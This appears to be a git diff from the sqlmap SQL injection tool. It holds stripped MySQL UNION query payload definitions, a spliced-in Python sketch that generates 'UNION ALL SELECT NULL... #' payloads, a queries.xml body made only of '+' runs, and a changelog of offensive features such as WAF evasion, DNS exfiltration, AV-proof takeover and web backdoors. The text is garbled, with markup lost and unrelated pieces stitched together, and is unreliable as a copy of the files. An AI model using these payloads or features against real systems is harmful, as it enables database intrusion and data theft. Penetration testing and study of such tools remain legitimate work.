+ + + MySQL UNION query (NULL) - 21 to 30 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + NULL + 21-30 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([RANDNUM]) - 21 to 30 columns + 6 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [RANDNUM] + 21-30 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([CHAR]) - 31 to 40 columns + 6 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [CHAR] + 31-40 + + + + +
+ MySQL +
+
+ + + MySQL UNION query (NULL) - 31 to 40 columns + 6 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + NULL + 31-40 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([RANDNUM]) - 31 to 40 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [RANDNUM] + 31-40 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([CHAR]) - 41 to 50 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [CHAR] + 41-50 + + + + +
+ MySQL +
+
+ + + MySQL UNION query (NULL) - 41 to 50 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + NULL + 41-50 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([RANDNUM]) - 41 to 50 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [RANDNUM] + 41-50 + + + + +
+ MySQL +
+
+ +
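Each UNION entry above describes a family of payloads rather than a single string: for every column count in the `[COLSTART]`-`[COLSTOP]` range, a `UNION ALL SELECT` with that many filler expressions (`[CHAR]`, `NULL` or `[RANDNUM]`) is tried, followed by the comment marker the test specifies (`#` for the MySQL family, `[GENERIC_SQL_COMMENT]` for the generic one). A sketch of that expansion, using the MySQL `#` comment; sqlmap's real generator also handles the `[UNION]` prefix/suffix and per-DBMS quirks.

```python
def union_candidates(colstart, colstop, filler="NULL", comment="#"):
    """Yield one UNION payload per column count in [COLSTART]-[COLSTOP].
    Illustrative sketch; not sqlmap's actual payload builder."""
    for columns in range(colstart, colstop + 1):
        yield "UNION ALL SELECT {} {}".format(",".join([filler] * columns), comment)

for candidate in union_candidates(1, 3):
    print(candidate)
# UNION ALL SELECT NULL #
# UNION ALL SELECT NULL,NULL #
# UNION ALL SELECT NULL,NULL,NULL #
```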
diff --git a/data/xml/queries.xml b/data/xml/queries.xml new file mode 100644 index 00000000000..5196459cc33 --- /dev/null +++ b/data/xml/queries.xml @@ -0,0 +1,1846 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + /> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/doc/AUTHORS b/doc/AUTHORS index d3758d676d3..300711a3a14 100644 --- a/doc/AUTHORS +++ b/doc/AUTHORS @@ -1,7 +1,7 @@ -Bernardo Damele Assumpcao Guimaraes (@inquisb) - - -Miroslav Stampar (@stamparm) - - -You can contact both developers by writing to dev@sqlmap.org +Bernardo Damele Assumpcao Guimaraes (@inquisb) + + +Miroslav Stampar (@stamparm) + + +You can contact both developers by writing to dev@sqlmap.org diff --git a/doc/CHANGELOG.md b/doc/CHANGELOG.md index e656280cc38..dada8fb47e0 100644 --- a/doc/CHANGELOG.md +++ b/doc/CHANGELOG.md @@ -1,14 +1,62 @@ -# Version 1.0 (upcoming) +# Version 1.10 (2026-01-01) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.9...1.10) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/11?closed=1) + +# Version 1.9 (2025-01-02) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.8...1.9) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/10?closed=1) + +# Version 1.8 (2024-01-03) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.7...1.8) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/9?closed=1) + +# Version 1.7 (2023-01-02) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.6...1.7) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/8?closed=1) + +# Version 1.6 (2022-01-03) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.5...1.6) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/7?closed=1) + +# Version 1.5 (2021-01-03) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.4...1.5) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/6?closed=1) + +# Version 1.4 (2020-01-01) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.3...1.4) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/5?closed=1) + +# Version 1.3 (2019-01-05) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.2...1.3) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/4?closed=1) + +# Version 1.2 (2018-01-08) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.1...1.2) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/3?closed=1) + +# Version 1.1 (2017-04-07) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.0...1.1) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/2?closed=1) + +# Version 1.0 (2016-02-27) * Implemented support for automatic decoding of page content through detected charset. * Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.). * Major improvements to program stabilization based on user reports. -* Added new tampering scripts avoiding popular WAF/IPS/IDS mechanisms. -* Added support for setting Tor proxy type together with port. +* Added new tampering scripts avoiding popular WAF/IPS mechanisms. * Fixed major bug with DNS leaking in Tor mode. * Added wordlist compilation made of the most popular cracking dictionaries. -* Added support for mnemonics substantially helping user with program setup. 
-* Implemented multi-processor hash cracking routine(s) on Linux OS. +* Implemented multi-processor hash cracking routine(s). * Implemented advanced detection techniques for inband and time-based injections by usage of standard deviation method. * Old resume files are now deprecated and replaced by faster SQLite based session mechanism. * Substantial code optimization and smaller memory footprint. @@ -25,12 +73,75 @@ * Added option `--csv-del` for manually setting delimiting character used in CSV output. * Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval. * Added switch `--smart` for conducting through tests only in case of positive heuristic(s). -* Added switch `--check-waf` for checking of existence of WAF/IPS/IDS protection. +* Added switch `--check-waf` for checking of existence of WAF/IPS protection. * Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables. * Added switch `--count` to count the number of entries for a specific table or all database(s) tables. -* Major improvements to switches --tables and --columns. -* Takeover switch --os-pwn improved: stealthier, faster and AV-proof. -* Added switch --mobile to imitate a mobile device through HTTP User-Agent header. +* Major improvements to switches `--tables` and `--columns`. +* Takeover switch `--os-pwn` improved: stealthier, faster and AV-proof. +* Added switch `--mobile` to imitate a mobile device through HTTP User-Agent header. +* Added switch `-a` to enumerate all DBMS data. +* Added option `--alert` to run host OS command(s) when SQL injection is found. +* Added option `--answers` to set user answers to asked questions during sqlmap run. +* Added option `--auth-file` to set HTTP authentication PEM cert/private key file. +* Added option `--charset` to force character encoding used during data retrieval. +* Added switch `--check-tor` to force checking of proper usage of Tor. +* Added option `--code` to set HTTP code to match when query is evaluated to True. +* Added option `--cookie-del` to set character to be used while splitting cookie values. +* Added option `--crawl` to set the crawling depth for the website starting from the target URL. +* Added option `--crawl-exclude` for setting regular expression for excluding pages from crawling (e.g. `"logout"`). +* Added option `--csrf-token` to set the parameter name that is holding the anti-CSRF token. +* Added option `--csrf-url` for setting the URL address for extracting the anti-CSRF token. +* Added option `--csv-del` for setting the delimiting character that will be used in CSV output (default `,`). +* Added option `--dbms-cred` to set the DBMS authentication credentials (user:password). +* Added switch `--dependencies` for turning on the checking of missing (non-core) sqlmap dependencies. +* Added switch `--disable-coloring` to disable console output coloring. +* Added option `--dns-domain` to set the domain name for usage in DNS exfiltration attack(s). +* Added option `--dump-format` to set the format of dumped data (`CSV` (default), `HTML` or `SQLITE`). +* Added option `--eval` for setting the Python code that will be evaluated before the request. +* Added switch `--force-ssl` to force usage of SSL/HTTPS. +* Added switch `--hex` to force usage of DBMS hex function(s) for data retrieval. +* Added option `-H` to set extra HTTP header (e.g. `"X-Forwarded-For: 127.0.0.1"`). +* Added switch `-hh` for showing advanced help message. +* Added option `--host` to set the HTTP Host header value. 
+* Added switch `--hostname` to turn on retrieval of DBMS server hostname. +* Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method. +* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS protection. +* Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized). +* Added switch `--invalid-bignum` for usage of big numbers while invalidating values. +* Added switch `--invalid-logical` for usage of logical operations while invalidating values. +* Added switch `--invalid-string` for usage of random strings while invalidating values. +* Added option `--load-cookies` to set the file containing cookies in Netscape/wget format. +* Added option `-m` to set the textual file holding multiple targets for scanning purposes. +* Added option `--method` to force usage of provided HTTP method (e.g. `PUT`). +* Added switch `--no-cast` for turning off payload casting mechanism. +* Added switch `--no-escape` for turning off string escaping mechanism. +* Added option `--not-string` for setting string to be matched when query is evaluated to False. +* Added switch `--offline` to force work in offline mode (i.e. only use session data). +* Added option `--output-dir` to set custom output directory path. +* Added option `--param-del` to set character used for splitting parameter values. +* Added option `--pivot-column` to set column name that will be used while dumping tables by usage of pivot(ing). +* Added option `--proxy-file` to set file holding proxy list. +* Added switch `--purge-output` to turn on safe removal of all content(s) from output directory. +* Added option `--randomize` to set parameter name(s) that will be randomly changed during sqlmap run. +* Added option `--safe-post` to set POST data for sending to safe URL. +* Added option `--safe-req` for loading HTTP request from a file that will be used during sending to safe URL. +* Added option `--skip` to skip testing of given parameter(s). +* Added switch `--skip-static` to skip testing parameters that not appear to be dynamic. +* Added switch `--skip-urlencode` to skip URL encoding of payload data. +* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS protection. +* Added switch `--smart` to conduct thorough tests only if positive heuristic(s). +* Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi). +* Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt. +* Added option `--test-filter` for test filtration by payloads and/or titles (e.g. `ROW`). +* Added option `--test-skip` for skipping tests by payloads and/or titles (e.g. `BENCHMARK`). +* Added switch `--titles` to turn on comparison of pages based only on their titles. +* Added option `--tor-port` to explicitly set Tor proxy port. +* Added option `--tor-type` to set Tor proxy type (`HTTP` (default), `SOCKS4` or `SOCKS5`). +* Added option `--union-from` to set table to be used in `FROM` part of UNION query SQL injection. +* Added option `--where` to set `WHERE` condition to be used during the table dumping. +* Added option `-X` to exclude DBMS database table column(s) from enumeration. +* Added option `-x` to set URL of sitemap(.xml) for target(s) parsing. +* Added option `-z` for usage of short mnemonics (e.g. `"flu,bat,ban,tec=EU"`). # Version 0.9 (2011-04-10) @@ -43,7 +154,7 @@ * Extended old `--dump -C` functionality to be able to search for specific database(s), table(s) and column(s), option `--search`. 
* Added support to tamper injection data with option `--tamper`. * Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack. -* Added support to enumerate roles on Oracle, --roles switch. +* Added support to enumerate roles on Oracle, `--roles` switch. * Added support for SOAP based web services requests. * Added support to fetch unicode data. * Added support to use persistent HTTP(s) connection for speed improvement, switch `--keep-alive`. @@ -88,18 +199,18 @@ * Major bugs fixed. * Cleanup of UDF source code repository, https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack. * Major code cleanup. -* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus softwares that mistakenly mark sqlmap as a malware. +* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus software that mistakenly mark sqlmap as a malware. * Updated user's manual. -* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from http://sqlmap.org/demo.html. +* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from https://sqlmap.org/demo.html. # Version 0.8 release candidate (2009-09-21) -* Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. +* Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (`--os-bof`) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. -* Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. -* Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. +* Added support for `--first` and `--last` so the user now has even more granularity in what to enumerate in the query output. +* Minor enhancement to save the session by default in 'output/hostname/session' file if `-s` option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring. @@ -108,13 +219,13 @@ * Adapted Metasploit wrapping functions to work with latest 3.3 development version too. * Adjusted code to make sqlmap 0.7 to work again on Mac OSX too. -* Reset takeover OOB features (if any of --os-pwn, --os-smbrelay or --os-bof is selected) when running under Windows because msfconsole and msfcli are not supported on the native Windows Ruby interpreter. This make sqlmap 0.7 to work again on Windows too. +* Reset takeover OOB features (if any of `--os-pwn`, `--os-smbrelay` or `--os-bof` is selected) when running under Windows because msfconsole and msfcli are not supported on the native Windows Ruby interpreter. 
This makes sqlmap 0.7 work again on Windows too.
* Minor improvement so that sqlmap tests also all parameters with no value (eg. par=).
* HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and 2.6+.
* Major bug fix to sql-query/sql-shell features.
-* Major bug fix in --read-file option.
+* Major bug fix in `--read-file` option.
* Major silent bug fix to multi-threading functionality.
-* Fixed the web backdoor functionality (for MySQL) when (usually) stacked queries are not supported and --os-shell is provided.
+* Fixed the web backdoor functionality (for MySQL) when (usually) stacked queries are not supported and `--os-shell` is provided.
* Fixed MySQL 'comment injection' version fingerprint.
* Fixed basic Microsoft SQL Server 2000 fingerprint.
* Many minor bug fixes and code refactoring.
@@ -136,32 +247,32 @@
* Major enhancement to make the comparison algorithm work properly also on url not stables automatically by using the difflib Sequence Matcher object;
* Major enhancement to support SQL data definition statements, SQL data manipulation statements, etc from user in SQL query and SQL shell if stacked queries are supported by the web application technology;
* Major speed increase in DBMS basic fingerprint;
-* Minor enhancement to support an option (--is-dba) to show if the current user is a database management system administrator;
-* Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause bruteforcing;
-* Added internal support to forge CASE statements, used only by --is-dba query at the moment;
-* Minor layout adjustment to the --update output;
+* Minor enhancement to support an option (`--is-dba`) to show if the current user is a database management system administrator;
+* Minor enhancement to support an option (`--union-tech`) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause bruteforcing;
+* Added internal support to forge CASE statements, used only by `--is-dba` query at the moment;
+* Minor layout adjustment to the `--update` output;
* Increased default timeout to 30 seconds;
* Major bug fix to correctly handle custom SQL "limited" queries on Microsoft SQL Server and Oracle;
* Major bug fix to avoid tracebacks when multiple targets are specified and one of them is not reachable;
* Minor bug fix to make the Partial UNION query SQL injection technique work properly also on Oracle and Microsoft SQL Server;
-* Minor bug fix to make the --postfix work even if --prefix is not provided;
+* Minor bug fix to make the `--postfix` work even if `--prefix` is not provided;
* Updated documentation.
# Version 0.6.3 (2008-12-18)
* Major enhancement to get list of targets to test from Burp proxy (http://portswigger.net/suite/) requests log file path or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) 'conversations/' folder path by providing option -l ;
* Major enhancement to support Partial UNION query SQL injection technique too;
-* Major enhancement to test if the web application technology supports stacked queries (multiple statements) by providing option --stacked-test which will be then used someday also by takeover functionality;
+* Major enhancement to test if the web application technology supports stacked queries (multiple statements) by providing option `--stacked-test` which will be then used someday also by takeover functionality;
-* Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option --time-test;
+* Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option `--time-test`;
* Minor enhancement to fingerprint the web server operating system and the web application technology by parsing some HTTP response headers;
* Minor enhancement to fingerprint the back-end DBMS operating system by parsing the DBMS banner value when -b option is provided;
-* Minor enhancement to be able to specify the number of seconds before timeout the connection by providing option --timeout #, default is set to 10 seconds and must be 3 or higher;
-* Minor enhancement to be able to specify the number of seconds to wait between each HTTP request by providing option --delay #;
-* Minor enhancement to be able to get the injection payload --prefix and --postfix from user;
+* Minor enhancement to be able to specify the number of seconds before timeout the connection by providing option `--timeout #`, default is set to 10 seconds and must be 3 or higher;
+* Minor enhancement to be able to specify the number of seconds to wait between each HTTP request by providing option `--delay #`;
+* Minor enhancement to be able to get the injection payload `--prefix` and `--postfix` from user;
* Minor enhancement to be able to enumerate table columns and dump table entries, also when the database name is not provided, by using the current database on MySQL and Microsoft SQL Server, the 'public' scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle;
-* Minor enhancemet to support also --regexp, --excl-str and --excl-reg options rather than only --string when comparing HTTP responses page content;
-* Minor enhancement to be able to specify extra HTTP headers by providing option --headers. By default Accept, Accept-Language and Accept-Charset headers are set;
-* Minor improvement to be able to provide CU (as current user) as user value (-U) when enumerating users privileges or users passwords;
+* Minor enhancement to support also `--regexp`, `--excl-str` and `--excl-reg` options rather than only `--string` when comparing HTTP responses page content;
+* Minor enhancement to be able to specify extra HTTP headers by providing option `--headers`.
By default Accept, Accept-Language and Accept-Charset headers are set; +* Minor improvement to be able to provide CU (as current user) as user value (`-U`) when enumerating users privileges or users passwords; * Minor improvements to sqlmap Debian package files; * Minor improvement to use Python psyco (http://psyco.sourceforge.net/) library if available to speed up the sqlmap algorithmic operations; * Minor improvement to retry the HTTP request up to three times in case an exception is raised during the connection to the target url; @@ -175,10 +286,10 @@ # Version 0.6.2 (2008-11-02) -* Major bug fix to correctly dump tables entries when --stop is not specified; +* Major bug fix to correctly dump tables entries when `--stop` is not specified; * Major bug fix so that the users' privileges enumeration now works properly also on both MySQL < 5.0 and MySQL >= 5.0; * Major bug fix when the request is POST to also send the GET parameters if any have been provided; -* Major bug fix to correctly update sqlmap to the latest stable release with command line --update; +* Major bug fix to correctly update sqlmap to the latest stable release with command line `--update`; * Major bug fix so that when the expected value of a query (count variable) is an integer and, for some reasons, its resumed value from the session file is a string or a binary file, the query is executed again and its new output saved to the session file; * Minor bug fix in MySQL comment injection fingerprint technique; * Minor improvement to correctly enumerate tables, columns and dump tables entries on Oracle and on PostgreSQL when the database name is not 'public' schema or a system database; @@ -191,20 +302,20 @@ * Major bug fix to blind SQL injection bisection algorithm to handle an exception; * Added a Metasploit Framework 3 auxiliary module to run sqlmap; * Implemented possibility to test for and inject also on LIKE statements; -* Implemented --start and --stop options to set the first and the last table entry to dump; -* Added non-interactive/batch-mode (--batch) option to make it easy to wrap sqlmap in Metasploit and any other tool; +* Implemented `--start` and `--stop` options to set the first and the last table entry to dump; +* Added non-interactive/batch-mode (`--batch`) option to make it easy to wrap sqlmap in Metasploit and any other tool; * Minor enhancement to save also the length of query output in the session file when retrieving the query output length for ETA or for resume purposes; * Changed the order sqlmap dump table entries from column by column to row by row. Now it also dumps entries as they are stored in the tables, not forcing the entries' order alphabetically anymore; -* Minor bug fix to correctly handle parameters' value with % character. +* Minor bug fix to correctly handle parameters' value with `%` character. 
# Version 0.6 (2008-09-01) * Complete code refactor and many bugs fixed; * Added multithreading support to set the maximum number of concurrent HTTP requests; -* Implemented SQL shell (--sql-shell) functionality and fixed SQL query (--sql-query, before called -e) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack; -* Added an option (--privileges) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator; -* Added support (-c) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (--save) to save command line options on a configuration file; -* Created a function that updates the whole sqlmap to the latest stable version available by running sqlmap with --update option; +* Implemented SQL shell (`--sql-shell`) functionality and fixed SQL query (`--sql-query`, before called `-e`) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack; +* Added an option (`--privileges`) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator; +* Added support (`-c`) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (`--save`) to save command line options on a configuration file; +* Created a function that updates the whole sqlmap to the latest stable version available by running sqlmap with `--update` option; * Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.) installation binary packages; * Created sqlmap .exe (Windows) portable executable; * Save a lot of more information to the session file, useful when resuming injection on the same target to not loose time on identifying injection, UNION fields and back-end DBMS twice or more times; @@ -216,8 +327,8 @@ * Improved XML files structure; * Implemented the possibility to change the HTTP Referer header; * Added support to resume from session file also when running with inband SQL injection attack; -* Added an option (--os-shell) to execute operating system commands if the back-end DBMS is MySQL, the web server has the PHP engine active and permits write access on a directory within the document root; -* Added a check to assure that the provided string to match (--string) is within the page content; +* Added an option (`--os-shell`) to execute operating system commands if the back-end DBMS is MySQL, the web server has the PHP engine active and permits write access on a directory within the document root; +* Added a check to assure that the provided string to match (`--string`) is within the page content; * Fixed various queries in XML file; * Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted the library to parse it; * Fixed password fetching function, mainly for Microsoft SQL Server and reviewed the password hashes parsing function; @@ -225,7 +336,7 @@ * Enhanced logging system: added three more levels of verbosity to show also HTTP sent and received traffic; * Enhancement to handle Set-Cookie from target url and automatically re-establish the Session when it expires; * Added support to inject also on Set-Cookie parameters; -* Implemented TAB completion and command history on both --sql-shell and --os-shell; +* Implemented TAB completion and command history on both `--sql-shell` and `--os-shell`; * Renamed some command line options; * Added a conversion library; * Added code schema and reminders for future developments; @@ -237,19 +348,19 @@ # Version 0.5 
(2007-11-04)
* Added support for Oracle database management system
-* Extended inband SQL injection functionality (--union-use) to all other possible queries since it only worked with -e and --file on all DMBS plugins;
+* Extended inband SQL injection functionality (`--union-use`) to all other possible queries since it only worked with `-e` and `--file` on all DBMS plugins;
* Added support to extract database users password hash on Microsoft SQL Server;
* Added a fuzzer function with the aim to parse HTML page looking for standard database error messages consequently improving database fingerprinting;
* Added support for SQL injection on HTTP Cookie and User-Agent headers;
-* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Splitted getValue() into getInband() and getBlind();
+* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Split getValue() into getInband() and getBlind();
* Major enhancements in common library and added checkForBrackets() method to check if the bracket(s) are needed to perform a UNION query SQL injection attack;
-* Implemented --dump-all functionality to dump entire DBMS data from all databases tables;
-* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries (--exclude-sysdbs);
+* Implemented `--dump-all` functionality to dump entire DBMS data from all databases tables;
+* Added support to exclude DBMS system databases when enumerating tables and dumping their entries (`--exclude-sysdbs`);
* Implemented in Dump.dbTableValues() method the CSV file dumped data automatic saving in csv/ folder by default;
* Added DB2, Informix and Sybase DBMS error messages and minor improvements in xml/errors.xml;
* Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/ column are specified to be dumped;
* Important fixes in lib/option.py to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function __setCSVDir() and fixed also in lib/dump.py;
-* Minor enhancement in lib/injection.py to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (q) the for cycle when using the google dork option (-g);
+* Minor enhancement in lib/injection.py to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (q) the for cycle when using the google dork option (`-g`);
* Minor fix in lib/request.py to properly encode the url to request in case the "fixed" part of the url has blank spaces;
* More minor layout enhancements in some libraries;
* Renamed DMBS plugins;
@@ -260,21 +371,21 @@
* Added DBMS fingerprint based also upon HTML error messages parsing defined in lib/parser.py which reads an XML file defining default error messages for each supported DBMS;
* Added Microsoft SQL Server extensive DBMS fingerprint checks based upon accurate '@@version' parsing matching on an XML file to get also the exact patching level of the DBMS;
-* Added support for query ETA (Estimated Time of Arrival) real time calculation (--eta);
-* Added support to extract database management system users password hash on MySQL and PostgreSQL (--passwords);
-* Added docstrings to all functions, classes and methods, consequently released the sqlmap development
documentation ; -* Implemented Google dorking feature (-g) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS; +* Added support for query ETA (Estimated Time of Arrival) real time calculation (`--eta`); +* Added support to extract database management system users password hash on MySQL and PostgreSQL (`--passwords`); +* Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation ; +* Implemented Google dorking feature (`-g`) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS; * Improved logging functionality: passed from banal 'print' to Python native logging library; -* Added support for more than one parameter in '-p' command line option; -* Added support for HTTP Basic and Digest authentication methods (--basic-auth and --digest-auth); -* Added the command line option '--remote-dbms' to manually specify the remote DBMS; -* Major improvements in union.UnionCheck() and union.UnionUse() functions to make it possible to exploit inband SQL injection also with database comment characters ('--' and '#') in UNION query statements; -* Added the possibility to save the output into a file while performing the queries (-o OUTPUTFILE) so it is possible to stop and resume the same query output retrieving in a second time (--resume); -* Added support to specify the database table column to enumerate (-C COL); -* Added inband SQL injection (UNION query) support (--union-use); +* Added support for more than one parameter in `-p` command line option; +* Added support for HTTP Basic and Digest authentication methods (`--basic-auth` and `--digest-auth`); +* Added the command line option `--remote-dbms` to manually specify the remote DBMS; +* Major improvements in union.UnionCheck() and union.UnionUse() functions to make it possible to exploit inband SQL injection also with database comment characters (`--` and `#`) in UNION query statements; +* Added the possibility to save the output into a file while performing the queries (`-o OUTPUTFILE`) so it is possible to stop and resume the same query output retrieving in a second time (`--resume`); +* Added support to specify the database table column to enumerate (`-C COL`); +* Added inband SQL injection (UNION query) support (`--union-use`); * Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements; * Reviewed the directory tree structure; -* Splitted lib/common.py: inband injection functionalities now are moved to lib/union.py; +* Split lib/common.py: inband injection functionalities now are moved to lib/union.py; * Updated documentation files. 
